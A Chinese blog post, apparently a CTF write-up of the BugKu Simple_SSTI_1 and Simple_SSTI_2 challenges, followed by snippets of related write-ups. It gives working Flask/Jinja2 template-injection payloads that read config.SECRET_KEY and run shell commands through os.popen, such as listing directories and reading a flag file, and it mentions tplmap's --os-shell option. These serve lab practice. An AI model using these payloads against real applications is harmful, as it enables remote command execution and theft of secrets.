BugKu_web Simple_SSTI

最新推荐文章于 2023-10-08 12:39:35 发布

独角授

最新推荐文章于 2023-10-08 12:39:35 发布

阅读量293

点赞数 1

分类专栏： ctf

本文链接：https://blog.csdn.net/weixin_47443077/article/details/118914283

版权

ctf 专栏收录该内容

7 篇文章 2 订阅

订阅专栏

本文详细介绍了两种Simple SSTI（Simple Server-Side Template Injection）情况，涉及利用F12查看页面源码，通过payload发现secret_key，并进行文件读取和命令执行。在Simple_SSTI_2中，作者展示了如何利用python3.7的Flask模板注入，执行ls命令发现文件夹，最终读取app/flag文件获取flag。

摘要由CSDN通过智能技术生成

BugKu_web Simple_SSTI

Simple_SSTI_1

打开页面如图示，根据提示要找到一个flag的参数

先尝试构造payload，发现页面有所变化

再用F12大法瞅瞅，发现有一行提示，在flask中经常设置一个secret_key变量

查询后知道secret_key格式是config.SECRET_KEY，拿到flag！

Simple_SSTI_2

打开页面和1一样，说明是模板注入，而且构造的payload也被执行了

上传错误语句发现是python3.7的flask模板注入

在网上搜集相关资料，找到了一些payload

文件读写：

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27输入命令%20../文件名称/%27).read()%20}}

命令执行：

/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27输入命令%20../%27).read()%20}}

先执行ls查看命令，发现有好多文件夹

接下来就尝试查看app文件夹内容

然后查看app文件夹里的flag文件，拿到flag！

/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

独角授

关注关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Bugku web Simple_SSTI_2 wp

Whaocai的博客

08-05

655

考点： ①SSTI注入最近学了学python ssti注入，找一道题练习练习。进去之后，提示我们有个flag参数，同时再用御剑扫一下发现没有别的页面。结合题目，直接payload：?flag={{1+1}},用的是flask模板 jinja2引擎常见的ssti构造payload思路是：这道题比较简单，什么敏感关键词都没有过滤 ...

BugKu CTF之 Simple_SSTI_2

weixin_42557264的博客

09-16

1938

进入场景和Simple_SSTI_1一样提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹，进入查看，先看看第一个，运气很好，第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.

1 条评论您还未登录，请先登录后发表或查看评论

Bugku WEB Simple_SSTI_1

lin的博客

04-12

5066

很简单的模板注入，查看页面源代码：很明显，flag在secret_key下。总结：查看网页源代码#按F12就都看到了，flag一般都在注释里，有时候注释里也会有一条hint或者是对解题有用的信息。

新BugKu-web篇-Simple_SSTI_2

jiuyongpinyin的博客

05-28

884

新BugKu-web篇-Simple_SSTI_2 这道题就比上一道题相对简单了，因为可以直接使用工具tplmap 下载链接： https://github.com/aStrowxyu/ssti-tools 不过需要Python2的环境使用工具获得shell python2 tplmap.py -u "http://114.67.246.176:12782?flag=1" --os-shell flag就在目录下 ...

Bugku WEB Simple_SSTI_2

lin的博客

04-12

1564

1. 打开后，题目提示存在模板注入 2. 先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 根据URL转换表，%20 -> 空格 %27 -> ', 上面的URL对应字符串为： /?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read(

每日一练：web--Simple_SSTI_1

weixin_52852770的博客

12-25

2432

因为咱也就是个萌新，所以打算在首页 - Bugku CTF上面练，大家都说这对萌新挺友好的，其他一些网站还需要收费呢。今天练的就是web的第一题啦Simple_SSTI_1 解锁题目就得到，翻译一波（你需要传入一个名为flag的参数）奇奇怪怪对吧，然后我右键看了源代码，所以在flask，flag是在secret_key下的就得URL+?flag={{config.SECRET_KEY}},就可以得到flag了总结：在找flag过程中，需要去多动脑筋，然后在...

BUGKU-simple_SSTI_1漏洞注入

最新发布

kingx3的博客

10-08

331

SSTI全称Server side template injection.服务端模板注入这节课主要讲flask的模板注入.flask会把类似于的变量当做参数来渲染并填充到web页面,如果该参数可控并被后台解析则有可能被注入恶意代码导致注入漏洞请注意模板注入只会存在于二次渲染中,无二次渲染不会出现模板注入。

BugkuWeb：Simple_SSTI_2

Light_inthe_eyes的博客

11-04

263

题目提示就很明显了是模板注入 flag={{config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} flag={{config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }} flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read

BugKu_WEB_(1)

young的博客

07-21

1043

BugKu平台练习wp

新BugKu-web篇-Simple_SSTI_1

jiuyongpinyin的博客

05-28

3138

新BugKu-web篇-Simple_SSTI_1 网上很很多的writeup，发现描述的都不是很全面，本人也是菜鸡，写一下对于这道题的理解，首先web应先看题目，再看源码，源码里没提示再看其他东西。回到这道题，先看题目题目告诉我们要传入一个flag参数，我尝试了POST直接就报错了，所以选择个get的传入方式，然后看源码提示我们在flask里，经常设置一个secret_key变量，这里就得讲一下了，首先是Jinjan2 基础语法分为三种： {% … %} {{ … }} {# … #}

CTFshow-WEB入门-SSTI

feng的博客

02-21

4263

前言开始SSTI，参考文章： flask之ssti模版注入从零到入门 SSTI模板注入绕过（进阶篇）记录一下自己学习的东西： __class__ 类的一个内置属性，表示实例对象的类。 __base__ 类型对象的直接基类 __bases__ 类型对象的全部基类，以元组形式，类型的实例通常没有属性 __bases__ __mro__ 此属性是由类组成的元组，在方法解析期间会基于它来查找基类。 __subclass

Bugku：Simple_SSTI_1

qq_46230755的博客

03-01

8437

很简单的模板注入，直接F12查看提示 flag在secret_key下。 bugku才是对萌新最友好的平台！！！!

BugKu的Simple_SSTI_1WEB详细解析

weixin_52219258的博客

01-13

1179

Simple_SSTI_1解析

ctf bugku

weixin_51387754的博客

08-13

2241

bugkuSimple_SSTI_1社工-进阶收集Simple_SSTI_2Flask_FileUpload1和0的故事easy_nbt留言板瑞士军刀入门逆向滑稽canarytelnet眼见非实啊哒/.-聪明的小羊ok[+-<>] Simple_SSTI_1 查看源码 You need pass in a parameter named flag。 You know, in the flask, We often set a secret_key variable 您需要传入一个名为flag

BugKu CTF Web

qq_51110485的博客

06-28

2301

BugKu CTF Web滑稽计算器GETPOSTSimple_SSTI_1矛盾Simple_SSTI_2 滑稽启动场景，打开链接，页面是一堆滑稽图片，查看网页源代码，flag在注释里面，去掉注释，提交即可。计算器打开链接，发现左边是一个加法运算，得到结果是119，但是输入框内只能输入1位数字，fn+f12（win10）打开审查代码，将输入框的maxlength改为3，输入结果，弹出flag。 GET 打开链接，访问页面，发现是一个简单赋值判断，意思是提交get类型 what=flag 会输出fl

web刷题笔记

limerenc_lin的博客

03-05

289

Flask：一个Python编写的Web 微框架，让我们可以使用Python语言快速实现一个网站或Web服务。我们经常设置一个secret_key变量,所以我们要读取secret_key变量，导出所有config变量，其中就包括SECRET_KEY,需要在题目url后面添加/?flag={{config.items()}} 当what以GET形式接受到flag参数时，输出FLAG 则在url后加?what=flag即可得到flag直接查看源代码，is_numeric($num))检测是不是为数字，只要后

SSTI模板注入总结

goddemon

12-23

1380

SSTI模板注入原理：获取一个输入，然后再后端的渲染处理上进行语句的拼接，然后执行。(即典型漏洞存在于框架中的渲染函数生成html时) 典型针对网站模板引擎： Python的jinja2 mako tornado django Python的jinja2 mako tornado django 模板引擎：即引擎中具有一套生成html的程序,只需获取用户的数据,然后放在渲染函数中即可生成一个前端的html页面分析学习：常用方法 //获取基本类 ''.__class__.__mro__[1] {}.__c

SSTI

qq_51301115的博客

05-11

402

Simple_SSTI_1 ?flag={{1*1}} 得到回显1，存在注入点查看页面源代码，得到提示we often set a secret_key variable flag是通过secret_key方法生成的加密字符串 ?flag={{config.SECRET_KEY}} 得到flag 使用tplmap python tplmap.py -u "url/?flag={{}}" python tplmap.py -u "url/?flag={{}}" --os-shell 提权成功，可以查

Spring Java config配置secret key

wwwcomy的程序猿感悟

09-27

729

JWT 中的第三部分是个签名，通过JJWT这个组件 [url]https://github.com/jwtk/jjwt[/url]可以很方便的生成/校验/解码Token中的内容，例子如下：生成JWT: [code="java"]String compactJws = Jwts.builder() .setSubject("Joe") .signWith(SignatureAlgo...

bugku simple_ssti_1

03-16

simple_ssti_1 是一道来自 Bugku 的简单 Server-Side Template Injection（SSTI）漏洞题目。 SSTI 漏洞通常发生在使用模板引擎时，攻击者可以利用这种漏洞执行任意代码。